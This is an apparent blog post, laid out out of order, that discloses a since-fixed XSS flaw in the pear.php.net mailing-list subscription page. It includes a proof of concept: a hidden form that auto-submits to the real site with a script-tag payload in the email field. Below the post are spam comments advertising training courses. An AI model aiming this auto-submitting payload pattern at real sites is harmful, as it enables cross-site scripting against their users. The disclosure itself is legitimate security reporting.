<head>
<script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
</head>
<body>
<form method="post" action="http://pear.php.net/support/lists.php" id="form" style="display:none">
<input name="maillist[pear-dev]" type="radio" value="normal" checked>
<input type="text" name="email" size="30" value="<script>alert('xss');</script>">
<input type="submit" name="action" value="Subscribe">
</form>
</body>
<script>
$('input[name=action]').click();
</script>
Fixed 08.07.2013.
Monday, April 21, 2014
pear.php.net XSS
Long time ago (28.06.2013) I found XSS bug in http://pear.php.net/support/lists.php. Email parameter was neither validated nor sanitized which resulted in XSS.
Proof of concept was:
Subscribe to:
Post Comments (Atom)
Insightful post! devops engineer course
ReplyDeletehelps bridge the gap between development and operations. Our course focuses on practical tools and automation techniques used in modern software environments.
⭐ Workday Online Training
ReplyDeleteComprehensive workday online training allows you to learn from anywhere.
The curriculum includes real-time projects and HR system configuration.
Interactive classes make complex concepts easy to understand.
Assignments strengthen functional expertise.
Expert trainers provide continuous guidance.
Flexible timings suit working professionals.
This training opens opportunities in global Workday careers.
An artificial intelligence course helps learners understand how machines simulate human intelligence using data, algorithms, and advanced computing techniques. It explains important topics such as machine learning, neural networks, and natural language processing. This artificial intelligence course helps students gain practical knowledge of building intelligent systems. Learners practice with real datasets and exercises to understand AI applications. Projects help them explore real-world use cases such as automation, prediction models, and intelligent software systems.
ReplyDelete